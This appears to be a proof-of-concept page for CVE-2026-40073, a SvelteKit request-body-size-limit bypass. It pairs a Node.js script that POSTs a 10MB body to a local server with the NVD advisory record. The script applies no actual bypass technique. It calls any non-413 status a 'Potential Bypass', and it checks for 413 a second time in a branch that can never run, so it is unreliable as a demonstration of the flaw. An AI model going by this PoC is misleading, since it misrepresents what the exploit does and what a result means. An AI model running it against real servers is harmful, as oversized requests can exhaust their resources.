CVE-2026-40073

// PoC for SvelteKit BODY_SIZE_LIMIT Bypass (CVE-2026-40073) // This script attempts to send a request body larger than the configured limit. // If the bypass works, the server accepts the payload instead of returning 413. const http = require('http'); const targetHost = 'localhost'; const targetPort = 3000; // Assuming the limit is set to 1MB, sending 10MB const largeBody = 'A'.repeat(10 * 1024 * 1024); const options = { hostname: targetHost, port: targetPort, path: '/', method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(largeBody), 'Connection': 'close' } }; const req = http.request(options, (res) => { console.log(`Status Code: ${res.statusCode}`); if (res.statusCode === 413) { console.log('[-] Failed: Limit enforced correctly.'); } else if (res.statusCode === 200 || res.statusCode === 500 || res.statusCode === 413) { // Note: 200/500 might indicate processing of large body (Bypass) // 413 might come from Nginx/Platform, not SvelteKit console.log('[+] Potential Bypass: Server processed the request or returned unexpected status.'); } res.resume(); }); req.on('error', (e) => { console.error(`Request error: ${e.message}`); }); req.write(largeBody); req.end();

{"cve": {"id": "CVE-2026-40073", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.357", "lastModified": "2026-04-15T18:43:03.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size limits at other layers of the application stack, so limits enforced in the WAF, gateway, or at the platform level are unaffected. This vulnerability is fixed in 2.57.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.57.1", "matchCriteriaId": "CC23CF52-37C9-4CA0-91A7-DF09E36C7886"}]}]}], "references": [{"url": "https://github.com/sveltejs/kit/commit/3202ed6c98f9e8d86bf0c4c7ad0f2e273e5e3b95", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/kit/releases/tag/@sveltejs/[email protected]", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sveltejs/kit/security/advisories/GHSA-2crg-3p73-43xp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}